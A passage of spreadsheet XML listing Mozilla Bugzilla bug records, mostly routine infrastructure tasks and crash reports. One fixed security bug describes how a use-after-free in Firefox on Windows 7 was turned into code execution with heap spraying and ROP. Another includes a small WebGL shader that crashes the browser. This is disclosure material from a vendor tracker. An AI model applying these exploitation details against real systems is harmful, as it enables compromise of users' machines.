        <v>280633</v>
      </c>
      <c r="B1357" t="inlineStr">
        <is>
          <t>2005-02-01 01:58:46 -0800</t>
        </is>
      </c>
      <c r="C1357" t="inlineStr">
        <is>
          <t>Tools to migrate existing legacy encoded database to UTF-8 (Unicode)</t>
        </is>
      </c>
      <c r="D1357" t="inlineStr">
        <is>
          <t>2008-10-21 14:28:04 -0700</t>
        </is>
      </c>
      <c r="E1357" t="n">
        <v>1</v>
      </c>
      <c r="F1357" t="n">
        <v>1</v>
      </c>
      <c r="G1357" t="n">
        <v>4</v>
      </c>
      <c r="H1357" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1357" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1357" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K1357" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1357" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1357" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1357" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1357" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1357" t="inlineStr">
        <is>
          <t>[Implementation: Comment 27]</t>
        </is>
      </c>
      <c r="Q1357" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1357" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1357" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T1357" t="n">
        <v>1</v>
      </c>
      <c r="U1357" t="n">
        <v>3</v>
      </c>
      <c r="V1357" t="n">
        <v>59</v>
      </c>
      <c r="W1357" t="inlineStr">
        <is>
          <t>This is a spin off bug from bug 126266 (Use UTF-8 (Unicode) charset encoding for
pages and email). 
Tools and/or documentation are required to provide a method for users of
bugzilla databases containing legacy data encodings to move to a UTF-8 encoded
database. The tools will enable them to automatically transcode known encodings
into UTF-8, or statistically detect encoding and where confidence is high,
transcode to UTF-8. This will enable existing bugzilla installations to upgrade
to the use of UTF-8 encoding throughout the entire database.</t>
        </is>
      </c>
      <c r="X1357" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1358">
      <c r="A1358" t="n">
        <v>683011</v>
      </c>
      <c r="B1358" t="inlineStr">
        <is>
          <t>2011-08-29 15:44:28 -0700</t>
        </is>
      </c>
      <c r="C1358" t="inlineStr">
        <is>
          <t>Remove decommissioned moz2-darwin9 slaves</t>
        </is>
      </c>
      <c r="D1358" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1358" t="n">
        <v>1</v>
      </c>
      <c r="F1358" t="n">
        <v>1</v>
      </c>
      <c r="G1358" t="n">
        <v>5</v>
      </c>
      <c r="H1358" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1358" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1358" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1358" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1358" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1358" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1358" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1358" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1358" t="inlineStr"/>
      <c r="Q1358" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1358" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1358" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1358" t="n">
        <v>1</v>
      </c>
      <c r="U1358" t="n">
        <v>0</v>
      </c>
      <c r="V1358" t="n">
        <v>12</v>
      </c>
      <c r="W1358" t="inlineStr">
        <is>
          <t>These slaves have been gone for some time and have been DNR'd:
 moz2-darwin9-slave05
 moz2-darwin9-slave20
 moz2-darwin9-slave40
 moz2-darwin9-slave59</t>
        </is>
      </c>
      <c r="X1358" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1359">
      <c r="A1359" t="n">
        <v>1199090</v>
      </c>
      <c r="B1359" t="inlineStr">
        <is>
          <t>2015-08-26 23:06:35 -0700</t>
        </is>
      </c>
      <c r="C1359" t="inlineStr">
        <is>
          <t>add printable recovery 2fa codes</t>
        </is>
      </c>
      <c r="D1359" t="inlineStr">
        <is>
          <t>2015-09-29 07:57:27 -0700</t>
        </is>
      </c>
      <c r="E1359" t="n">
        <v>1</v>
      </c>
      <c r="F1359" t="n">
        <v>1</v>
      </c>
      <c r="G1359" t="n">
        <v>7</v>
      </c>
      <c r="H1359" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1359" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J1359" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1359" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L1359" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1359" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1359" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1359" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1359" t="inlineStr"/>
      <c r="Q1359" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1359" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1359" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1359" t="n">
        <v>1</v>
      </c>
      <c r="U1359" t="n">
        <v>0</v>
      </c>
      <c r="V1359" t="n">
        <v>6</v>
      </c>
      <c r="W1359" t="inlineStr">
        <is>
          <t>add printable recovery 2fa codes</t>
        </is>
      </c>
      <c r="X1359" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1360">
      <c r="A1360" t="n">
        <v>1500223</v>
      </c>
      <c r="B1360" t="inlineStr">
        <is>
          <t>2018-10-18 12:20:25 -0700</t>
        </is>
      </c>
      <c r="C1360" t="inlineStr">
        <is>
          <t>Long commit messages are cut off</t>
        </is>
      </c>
      <c r="D1360" t="inlineStr">
        <is>
          <t>2021-01-11 14:30:47 -0800</t>
        </is>
      </c>
      <c r="E1360" t="n">
        <v>1</v>
      </c>
      <c r="F1360" t="n">
        <v>1</v>
      </c>
      <c r="G1360" t="n">
        <v>7</v>
      </c>
      <c r="H1360" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1360" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J1360" t="inlineStr">
        <is>
          <t>Lando</t>
        </is>
      </c>
      <c r="K1360" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1360" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1360" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1360" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1360" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1360" t="inlineStr"/>
      <c r="Q1360" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1360" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1360" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1360" t="n">
        <v>1</v>
      </c>
      <c r="U1360" t="n">
        <v>0</v>
      </c>
      <c r="V1360" t="n">
        <v>7</v>
      </c>
      <c r="W1360" t="inlineStr">
        <is>
          <t>Created attachment 9018360
Screenshot 2018-10-18 at 14.02.32.png
Long commit messages are cut off after eight lines as shown by the
attached screenshot.  It would be great if commit messages were
shown in full.</t>
        </is>
      </c>
      <c r="X1360" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1361">
      <c r="A1361" t="n">
        <v>1561912</v>
      </c>
      <c r="B1361" t="inlineStr">
        <is>
          <t>2019-06-27 07:04:37 -0700</t>
        </is>
      </c>
      <c r="C1361" t="inlineStr">
        <is>
          <t>Crash in [@ mozilla::FilePreferences::IsAllowedPath]</t>
        </is>
      </c>
      <c r="D1361" t="inlineStr">
        <is>
          <t>2022-01-10 04:58:44 -0800</t>
        </is>
      </c>
      <c r="E1361" t="n">
        <v>1</v>
      </c>
      <c r="F1361" t="n">
        <v>1</v>
      </c>
      <c r="G1361" t="n">
        <v>3</v>
      </c>
      <c r="H1361" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1361" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1361" t="inlineStr">
        <is>
          <t>Networking: File</t>
        </is>
      </c>
      <c r="K1361" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L1361" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1361" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1361" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1361" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1361" t="inlineStr">
        <is>
          <t>[geckoview:fenix:m8] [bcs:p1][necko-triaged] [fennec68.1][adv-main69+][adv-esr68.1+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1361" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1361" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1361" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T1361" t="n">
        <v>1</v>
      </c>
      <c r="U1361" t="n">
        <v>0</v>
      </c>
      <c r="V1361" t="n">
        <v>26</v>
      </c>
      <c r="W1361" t="inlineStr">
        <is>
          <t>This bug is for crash report bp-ca131877-1b9f-4d9d-b637-e6c5e0190627.
Seen while looking at FX for Android crash stats, but this affects Fenix MVP (20190612114833) and Focus from what I can tell in crash stats: https://bit.ly/2Xf86ez. All of the signatures appear to be possible UAF addresses, plus a high percentage in Fennec are startup crashes. The Fennec crashes are seen in the most recent Fennec betas.
(100.0% in signature vs 00.34% overall) address = 0xe5e5e5e5e5e5e5e5
(100.0% in signature vs 19.86% overall) Module "libvixl-arm64.so" = true
(87.50% in signature vs 02.80% overall) startup_crash = 1
```
Top 10 frames of crashing thread:
0 libxul.so mozilla::FilePreferences::IsAllowedPath xpcom/ds/nsTArray.h:344
1 libxul.so nsLocalFile::GetDiskSpaceAvailable xpcom/io/nsLocalFileUnix.cpp:1327
2 libxul.so mozilla::net::CacheFileIOManager::OverLimitEvictionInternal netwerk/cache2/CacheFileIOManager.cpp:2779
3 libxul.so mozilla::detail::RunnableMethodImpl&lt;RefPtr&lt;mozilla::dom::WorkerListener&gt;, void  xpcom/threads/nsThreadUtils.h:1128
4 libxul.so mozilla::net::CacheIOThread::ThreadFunc netwerk/cache2/CacheIOThread.cpp:545
5 libnss3.so _pt_root nsprpub/pr/src/pthreads/ptthread.c:201
6 libc.so libc.so@0x63679 
7 libc.so libc.so@0x63661 
8 libc.so libc.so@0x1dff9 
9 android.hardware.drm@1.1.so android.hardware.drm@1.1.so@0x1976 
```</t>
        </is>
      </c>
      <c r="X1361" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1362">
      <c r="A1362" t="n">
        <v>1429457</v>
      </c>
      <c r="B1362" t="inlineStr">
        <is>
          <t>2018-01-10 08:23:21 -0800</t>
        </is>
      </c>
      <c r="C1362" t="inlineStr">
        <is>
          <t>[mozlint] Formalize setup functions in linter definitions</t>
        </is>
      </c>
      <c r="D1362" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E1362" t="n">
        <v>1</v>
      </c>
      <c r="F1362" t="n">
        <v>1</v>
      </c>
      <c r="G1362" t="n">
        <v>7</v>
      </c>
      <c r="H1362" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1362" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J1362" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K1362" t="inlineStr">
        <is>
          <t>3 Branch</t>
        </is>
      </c>
      <c r="L1362" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1362" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1362" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1362" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1362" t="inlineStr"/>
      <c r="Q1362" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1362" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1362" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T1362" t="n">
        <v>1</v>
      </c>
      <c r="U1362" t="n">
        <v>0</v>
      </c>
      <c r="V1362" t="n">
        <v>16</v>
      </c>
      <c r="W1362" t="inlineStr">
        <is>
          <t>Most linters have some sort of setup they need to perform (installing packages, copying files, etc). Typically this just happens at the start of the 'lint' method, so that it just runs when the user invokes |mach lint|.
This is good, but we also want to run this setup on |mach bootstrap|, for example. We should add the concept of 'setup' functions to the linter definitions. Mozlint could still automatically invoke them if needed, but we could also implement a |mach lint setup| command. This would make it easy to invoke setup from other commands like |mach bootstrap|.</t>
        </is>
      </c>
      <c r="X1362" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1363">
      <c r="A1363" t="n">
        <v>529747</v>
      </c>
      <c r="B1363" t="inlineStr">
        <is>
          <t>2009-11-18 22:42:43 -0800</t>
        </is>
      </c>
      <c r="C1363" t="inlineStr">
        <is>
          <t>Request to move Solaris contrib. builds for Firefox 3.6b3 to bouncer</t>
        </is>
      </c>
      <c r="D1363" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1363" t="n">
        <v>1</v>
      </c>
      <c r="F1363" t="n">
        <v>1</v>
      </c>
      <c r="G1363" t="n">
        <v>5</v>
      </c>
      <c r="H1363" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1363" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1363" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1363" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1363" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1363" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N1363" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1363" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1363" t="inlineStr"/>
      <c r="Q1363" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1363" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1363" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1363" t="n">
        <v>1</v>
      </c>
      <c r="U1363" t="n">
        <v>0</v>
      </c>
      <c r="V1363" t="n">
        <v>2</v>
      </c>
      <c r="W1363" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #524920 +++
Firefox 3.6b3
solaris-sparc:
/firefox/releases/3.6b3/contrib/solaris_tarball/firefox-3.6b3.en-US.solaris-10-fcs-sparc.tar.bz2
solaris-i386:
/firefox/releases/3.6b3/contrib/solaris_tarball/firefox-3.6b3.en-US.solaris-10-fcs-i386.tar.bz2
opensolaris-sparc:
/contrib/solaris_tarball/firefox-3.6b3.en-US.opensolaris-sparc.tar.bz2
opensolaris-i386:
/contrib/solaris_tarball/firefox-3.6b3.en-US.opensolaris-i386.tar.bz2
The partial MAR for (3.6b2 to 3.6b3):
/firefox/releases/3.6b3/contrib/solaris_tarball/firefox-3.6b2-3.6b3.en-US.solaris-10-fcs-sparc.partial.mar
/firefox/releases/3.6b3/contrib/solaris_tarball/firefox-3.6b2-3.6b3.en-US.solaris-10-fcs-i386.partial.mar
/firefox/releases/3.6b3/contrib/solaris_tarball/firefox-3.6b2-3.6b3.en-US.opensolaris-sparc.partial.mar
/firefox/releases/3.6b3/contrib/solaris_tarball/firefox-3.6b2-3.6b3.en-US.opensolaris-i386.partial.mar
The complete MAR for 3.6b3:
/firefox/releases/3.6b3/contrib/solaris_tarball/firefox-3.6b3.en-US.solaris-10-fcs-sparc.complete.mar
/firefox/releases/3.6b3/contrib/solaris_tarball/firefox-3.6b3.en-US.solaris-10-fcs-i386.complete.mar
/firefox/releases/3.6b3/contrib/solaris_tarball/firefox-3.6b3.en-US.opensolaris-sparc.complete.mar
/firefox/releases/3.6b3/contrib/solaris_tarball/firefox-3.6b3.en-US.opensolaris-i386.complete.mar
Thanks!</t>
        </is>
      </c>
      <c r="X1363" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1364">
      <c r="A1364" t="n">
        <v>470487</v>
      </c>
      <c r="B1364" t="inlineStr">
        <is>
          <t>2008-12-19 14:41:08 -0800</t>
        </is>
      </c>
      <c r="C1364" t="inlineStr">
        <is>
          <t>Firefox Crash [@ nsWindow::GetParentWindow(int)]  &amp; [@ nsBaseWidget::Destroy()]?</t>
        </is>
      </c>
      <c r="D1364" t="inlineStr">
        <is>
          <t>2015-10-16 11:52:18 -0700</t>
        </is>
      </c>
      <c r="E1364" t="n">
        <v>1</v>
      </c>
      <c r="F1364" t="n">
        <v>1</v>
      </c>
      <c r="G1364" t="n">
        <v>3</v>
      </c>
      <c r="H1364" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1364" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1364" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K1364" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L1364" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1364" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1364" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1364" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1364" t="inlineStr">
        <is>
          <t>[sg:critical?][crashkill][crashkill-fix]</t>
        </is>
      </c>
      <c r="Q1364" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1364" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1364" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T1364" t="n">
        <v>1</v>
      </c>
      <c r="U1364" t="n">
        <v>0</v>
      </c>
      <c r="V1364" t="n">
        <v>158</v>
      </c>
      <c r="W1364" t="inlineStr">
        <is>
          <t>Currently the #4 top crash in Firefox 3.1b2
0  	xul.dll  	nsWindow::GetParentWindow  	widget/src/windows/nsWindow.cpp:1544
1 	xul.dll 	nsWindow::GetParent 	widget/src/windows/nsWindow.cpp:1518
2 	xul.dll 	nsBaseWidget::Destroy 	widget/src/xpwidgets/nsBaseWidget.cpp:260
3 	xul.dll 	nsWindow::Destroy 	widget/src/windows/nsWindow.cpp:1416
4 	xul.dll 	nsPluginInstanceOwner::Destroy 	layout/generic/nsObjectFrame.cpp:4030
5 	xul.dll 	DoStopPlugin 	layout/generic/nsObjectFrame.cpp:1987
6 	xul.dll 	nsStopPluginRunnable::Run 	layout/generic/nsObjectFrame.cpp:2024
7 	xul.dll 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:510
8 	xul.dll 	nsBaseAppShell::Run 	widget/src/xpwidgets/nsBaseAppShell.cpp:170
9 	nspr4.dll 	PR_GetEnv 	
10 	firefox.exe 	wmain 	toolkit/xre/nsWindowsWMain.cpp:87
11 	firefox.exe 	firefox.exe@0x2197 	
12 	kernel32.dll 	kernel32.dll@0x17066
not many comments to go on.
*replying to message in yahoo mail at the time it crashed. Had just hit reply</t>
        </is>
      </c>
      <c r="X1364" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1365">
      <c r="A1365" t="n">
        <v>684555</v>
      </c>
      <c r="B1365" t="inlineStr">
        <is>
          <t>2011-09-03 20:38:55 -0700</t>
        </is>
      </c>
      <c r="C1365" t="inlineStr">
        <is>
          <t>Exploitable "use after free" @ SHLWAPI!IUnknown_QueryService 0x3b</t>
        </is>
      </c>
      <c r="D1365" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:29 -0700</t>
        </is>
      </c>
      <c r="E1365" t="n">
        <v>1</v>
      </c>
      <c r="F1365" t="n">
        <v>1</v>
      </c>
      <c r="G1365" t="n">
        <v>3</v>
      </c>
      <c r="H1365" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1365" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1365" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K1365" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1365" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1365" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1365" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1365" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1365" t="inlineStr">
        <is>
          <t>[sg:critical?][qa+]</t>
        </is>
      </c>
      <c r="Q1365" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1365" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1365" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T1365" t="n">
        <v>1</v>
      </c>
      <c r="U1365" t="n">
        <v>0</v>
      </c>
      <c r="V1365" t="n">
        <v>65</v>
      </c>
      <c r="W1365" t="inlineStr">
        <is>
          <t>Created attachment 558117
POC files to reproduce bug, along with some screenshots
Under windows 7 32-bit, a crash can be caused with the attached code.  
The simplest POC code includes a parent and one child window.  The parent window spawns the child and after a short delay invokes a 'file open' dialog from the child.  Then the parent closes the child window.  This causes an exploitable crash. 
Pre-requisites:
* JavaScript enabled
* Ability to create at least one pop-up window (not a tab)
       [browser.link.open_newwindow -&gt; 2]  [or a popup blocker bypass]
* Firefox 5, 6 or Nightly [other versions not tested]
In the basic POC, the faulting instruction is a CALL to freed memory:
SHLWAPI!IUnknown_QueryService+0x3b:
76d842a1 ff11            call    dword ptr [ecx]
ds:0023:feeefeee=????????
Note that 0xfeeefeee is what is placed into Windows memory which has been HeapFree'd.  
We are also attaching an exploit POC; this uses two child windows.
Due to certain allocation sequences, it turns out that 0x10693AEA ends up being in ECX about 30% of the time.  Believe it or not, this address comes from the binary representation of the GUID for "my computer" {20d04fe0-3aea-1069-a2d8-08002b30309d} which ends up in the memory where ECX gets loaded.  So a stable pointer value turns up in ECX quite often.  On 32-bit Windows 7, a heap spray can arrange for page-aligned data to turn up at 0x10693AEA.
With more work on heap feng shui (i.e, using javascript to control memory allocations) it may be possible to get 0x10693AEA into ECX more reliably or in fact directly control the value which goes into ECX.
The exploit POC should show 0x0c0c0c0c at the top of the call stack.  We have got code execution on Windows 7 with DEP turned off; it is also possible to get this to work on stock  Windows 7 using a heap-based ROP.
We were only able to reproduce this issue on Windows 7 32-bit (XP and Win7 64 did not crash).  Non-windows operating systems should not be vulnerable.</t>
        </is>
      </c>
      <c r="X1365" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1366">
      <c r="A1366" t="n">
        <v>1301381</v>
      </c>
      <c r="B1366" t="inlineStr">
        <is>
          <t>2016-09-08 05:58:50 -0700</t>
        </is>
      </c>
      <c r="C1366" t="inlineStr">
        <is>
          <t>Memory corruption @ libGLESv2!rx::VaryingPacking::isFree</t>
        </is>
      </c>
      <c r="D1366" t="inlineStr">
        <is>
          <t>2024-05-30 09:21:24 -0700</t>
        </is>
      </c>
      <c r="E1366" t="n">
        <v>1</v>
      </c>
      <c r="F1366" t="n">
        <v>1</v>
      </c>
      <c r="G1366" t="n">
        <v>3</v>
      </c>
      <c r="H1366" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1366" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1366" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K1366" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L1366" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1366" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N1366" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1366" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1366" t="inlineStr">
        <is>
          <t>[adv-main50.1+][adv-esr45.6+]</t>
        </is>
      </c>
      <c r="Q1366" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1366" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1366" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T1366" t="n">
        <v>1</v>
      </c>
      <c r="U1366" t="n">
        <v>0</v>
      </c>
      <c r="V1366" t="n">
        <v>44</v>
      </c>
      <c r="W1366" t="inlineStr">
        <is>
          <t>Created attachment 8789367
crash.html
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Build ID: 20160907030427
Steps to reproduce:
Open crash.html
Actual results:
Firefox crashes after 1-2 sec.
The reason is when using vector constructor with varying array:
precision mediump float;  
varying  vec4 niqqki[100]; 
void main() {  
vec4 (niqqki[0]);
} 
This could be a security issue ?
Expected results:
No crash or compiler error.</t>
        </is>
      </c>
      <c r="X1366" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1367">
      <c r="A1367" t="n">
        <v>1455490</v>
      </c>
      <c r="B1367" t="inlineStr">
        <is>
          <t>2018-04-19 18:26:10 -0700</t>
        </is>
      </c>
      <c r="C1367" t="inlineStr">
        <is>
          <t>Crash in static void webrender::resource_cache::ResourceCache::block_until_all_resources_added (Invalid vector image key)</t>
        </is>
      </c>
      <c r="D1367" t="inlineStr">
        <is>
          <t>2018-06-06 05:21:25 -0700</t>
        </is>
      </c>
      <c r="E1367" t="n">
        <v>1</v>
      </c>
      <c r="F1367" t="n">
        <v>1</v>
      </c>
      <c r="G1367" t="n">
        <v>3</v>
      </c>
      <c r="H1367" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1367" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1367" t="inlineStr">
        <is>
          <t>Graphics: WebRender</t>
        </is>
      </c>
      <c r="K1367" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1367" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1367" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1367" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1367" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1367" t="inlineStr"/>
      <c r="Q1367" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1367" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1367" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1367" t="n">
        <v>1</v>
      </c>
      <c r="U1367" t="n">
        <v>0</v>
      </c>
      <c r="V1367" t="n">
        <v>17</v>
      </c>
      <c r="W1367" t="inlineStr">
        <is>
          <t>Seen on Socorro. 2 reports from Win10, probably from the same user.
bp-092f1f0e-c2f8-49c9-a41c-c5f930180420 build 20180419100148.
&gt; Invalid vector image key</t>
        </is>
      </c>
      <c r="X1367" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1368">
      <c r="A1368" t="n">
        <v>1363814</v>
      </c>
      <c r="B1368" t="inlineStr">
        <is>
          <t>2017-05-10 10:35:36 -0700</t>
        </is>
      </c>
      <c r="C1368" t="inlineStr">
        <is>
          <t>Switch stage/prod to Heroku's automated Let's Encrypt based SSL solution (ACM)</t>
        </is>
      </c>
      <c r="D1368" t="inlineStr">
        <is>
          <t>2017-05-23 15:24:02 -0700</t>
        </is>
      </c>
      <c r="E1368" t="n">
        <v>1</v>
      </c>
      <c r="F1368" t="n">
        <v>1</v>
      </c>
      <c r="G1368" t="n">
        <v>7</v>
      </c>
